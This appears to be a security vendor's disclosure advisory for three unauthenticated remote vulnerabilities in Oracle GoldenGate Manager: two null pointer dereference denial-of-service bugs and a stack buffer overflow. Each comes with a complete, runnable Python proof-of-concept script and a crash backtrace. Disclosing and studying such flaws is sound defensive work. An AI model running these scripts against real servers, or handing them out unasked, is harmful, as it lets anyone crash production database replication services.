[R1] Multiple Oracle GoldenGate Manager Vulnerabilities

While researching Oracle GoldenGate, Tenable found three vulnerabilities in GoldenGate Manager. GoldenGate Manager is the process that is in charge of monitoring, controlling, and reporting status on other GoldenGate components. The Manager listens on port 7809 where it accepts GoldenGate Software Command Interface (GGSCI) commands.

CVE-2018-2912: Unauthenticated Remote Denial of Service

A null pointer dereference can occur if an unauthenticated remote attacker provides a malformed command in the connection initiation. Specifically, an attacker can trigger the condition by sending a START and VERSION but omitting the separating tab character. The following is a proof of concept:

import sys
import struct
import socket

if len(sys.argv) != 3:
    print 'Usage: ./tab_deref.py <host> <port>'
    sys.exit(0)

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = (sys.argv[1], int(sys.argv[2]))
print '[+] connecting to %s port %s' % server_address
sock.connect(server_address)
print '[+] sending crash text'
cmd = 'START VERSION'
length = struct.pack(">H", len(cmd))
sock.sendall(length + cmd)
print '[+] Fin.'
sock.close()

The proof of concept generates the following stack trace:

(gdb) bt
#0  0x00000000005d61f3 in check_messages (timeout=<optimized out>, dynamic_ports=...)
    at /scratch/aime/adestore/views/aime_adc4150408/oggcore/OpenSys/src/app/mgr/mgr.c:2710
#1  0x00000000005d7eb1 in main_loop (argc=argc@entry=3, argv=argv@entry=0x7fffffffde48)
    at /scratch/aime/adestore/views/aime_adc4150408/oggcore/OpenSys/src/app/mgr/mgr.c:2361
#2  0x00000000005d82a3 in mgr_main (argc=3, argv=0x7fffffffde48)
    at /scratch/aime/adestore/views/aime_adc4150408/oggcore/OpenSys/src/app/mgr/mgr.c:2493
#3  0x00000000005325e6 in ggs::gglib::MultiThreading::MainThread::ExecMain (this=0x7fffffffdc50)
    at /scratch/aime/adestore/views/aime_adc4150408/oggcore/OpenSys/src/gglib/ggstd/MultiThreading.cpp:1302
#4  0x00000000005369b7 in ggs::gglib::MultiThreading::Thread::RunThread (threadArgs=threadArgs@entry=0xe3ea90)
    at /scratch/aime/adestore/views/aime_adc4150408/oggcore/OpenSys/src/gglib/ggstd/MultiThreading.cpp:496
#5  0x0000000000536fcd in ggs::gglib::MultiThreading::MainThread::Run (this=<optimized out>, argc=<optimized out>, argv=<optimized out>)
    at /scratch/aime/adestore/views/aime_adc4150408/oggcore/OpenSys/src/gglib/ggstd/MultiThreading.cpp:1293
#6  0x00000000005d892b in main ()

CVE-2018-2913: Unauthenticated Remote Stack Buffer Overflow

A stack buffer overflow can occur if an unauthenticated remote attacker provides a malformed command. An attacker can trigger the condition by simply sending a long command. The following is a proof of concept:

import sys
import struct
import socket

if len(sys.argv) != 3:
    print 'Usage: ./buffer_overrun.py <host> <port>'
    sys.exit(0)

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = (sys.argv[1], int(sys.argv[2]))
print '[+] connecting to %s port %s' % server_address
sock.connect(server_address)
print '[+] sending crash text'
cmd = 'Nessus\taaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'
length = struct.pack(">H", len(cmd))
sock.sendall(length + cmd)
print '[+] Fin.'
sock.close()

The proof of concept generates the following stack trace:

(gdb) bt
#0  0x00007fffefbfa428 in __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:54
#1  0x00007fffefbfc02a in __GI_abort () at abort.c:89
#2  0x00007fffefc3c7ea in __libc_message (do_abort=do_abort@entry=1, fmt=fmt@entry=0x7fffefd538a2 "*** %s ***: %s terminated\n")
    at ../sysdeps/posix/libc_fatal.c:175
#3  0x00007fffefcdd56c in __GI___fortify_fail (msg=<optimized out>, msg@entry=0x7fffefd53884 "stack smashing detected") at fortify_fail.c:37
#4  0x00007fffefcdd510 in __stack_chk_fail () at stack_chk_fail.c:28
#5  0x00000000005daf09 in MGRSEC_check_client_access (instr=<optimized out>, 
    client_ip_addr=0xbe3868 <ggs::ggAdmin::AdminCtx::getInstance()::instance+904> "192.168.1.152", reply=0x7ffffffee3b0 "Access denied")
    at /scratch/aime/adestore/views/aime_adc4150408/oggcore/OpenSys/src/app/mgr/mgrsec.c:448
#6  0x6161616161616161 in ?? ()
#7  0x6161616161616161 in ?? ()
#8  0x6161616161616161 in ?? ()
#9  0x6161616161616161 in ?? ()
#10 0x6161616161616161 in ?? ()
#11 0x6161616161616161 in ?? ()
#12 0x6161616161616161 in ?? ()
#13 0x6161616161616161 in ?? ()
#14 0x6161616161616161 in ?? ()
#15 0x6161616161616161 in ?? ()
#16 0x6161616161616161 in ?? ()
#17 0x6161616161616161 in ?? ()
#18 0x6161616161616161 in ?? ()
#19 0x6161616161616161 in ?? ()
#20 0x6161616161616161 in ?? ()
#21 0x6161616161616161 in ?? ()
#22 0x6161616161616161 in ?? ()
#23 0x6161616161616161 in ?? ()
#24 0x6161616161616161 in ?? ()
#25 0x6161616161616161 in ?? ()
#26 0x6161616161616161 in ?? ()
#27 0x6161616161616161 in ?? ()
#28 0x6161616161616161 in ?? ()
#29 0x6161616161616161 in ?? ()
#30 0x0000030061616161 in ?? ()
#31 0x00000000000003e8 in ?? ()
#32 0x0000000000000000 in ?? ()

CVE-2018-2914: Unauthenticated Remote Denial of Service

Another null pointer dereference can occur if an unauthenticated remote attacker provides a malformed command. The condition is triggered when an attacker sends an incomplete REPORT command to the server. The following is a proof of concept:

import sys
import struct
import socket

if len(sys.argv) != 3:
    print 'Usage: ./report_dereference.py <host> <port>'
    sys.exit(0)

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = (sys.argv[1], int(sys.argv[2]))
print '[+] connecting to %s port %s' % server_address
sock.connect(server_address)
print '[+] sending crash text'
cmd = 'Nessus\tREPORT'
length = struct.pack(">H", len(cmd))
sock.sendall(length + cmd)
print '[+] Fin.'
sock.close()

The proof of concept generates the following stack trace:

(gdb) bt
#0  __GI_____strtol_l_internal (nptr=0x0, endptr=0x0, base=10, group=<optimized out>, loc=0x7fffeff89420 <_nl_global_locale>)
    at ../stdlib/strtol_l.c:293
#1  0x00000000005d6d7c in strtol (__base=10, __endptr=0x0, __nptr=<optimized out>) at /usr/include/stdlib.h:336
#2  atoi (__nptr=<optimized out>) at /usr/include/stdlib.h:404
#3  check_messages (timeout=<optimized out>, dynamic_ports=...) at /scratch/aime/adestore/views/aime_adc4150408/oggcore/OpenSys/src/app/mgr/mgr.c:2817
#4  0x00000000005d7eb1 in main_loop (argc=argc@entry=3, argv=argv@entry=0x7fffffffde48)
    at /scratch/aime/adestore/views/aime_adc4150408/oggcore/OpenSys/src/app/mgr/mgr.c:2361
#5  0x00000000005d82a3 in mgr_main (argc=3, argv=0x7fffffffde48)
    at /scratch/aime/adestore/views/aime_adc4150408/oggcore/OpenSys/src/app/mgr/mgr.c:2493
#6  0x00000000005325e6 in ggs::gglib::MultiThreading::MainThread::ExecMain (this=0x7fffffffdc50)
    at /scratch/aime/adestore/views/aime_adc4150408/oggcore/OpenSys/src/gglib/ggstd/MultiThreading.cpp:1302
#7  0x00000000005369b7 in ggs::gglib::MultiThreading::Thread::RunThread (threadArgs=threadArgs@entry=0xe3ea90)
    at /scratch/aime/adestore/views/aime_adc4150408/oggcore/OpenSys/src/gglib/ggstd/MultiThreading.cpp:496
#8  0x0000000000536fcd in ggs::gglib::MultiThreading::MainThread::Run (this=<optimized out>, argc=<optimized out>, argv=<optimized out>)
    at /scratch/aime/adestore/views/aime_adc4150408/oggcore/OpenSys/src/gglib/ggstd/MultiThreading.cpp:1293
#9  0x00000000005d892b in main ()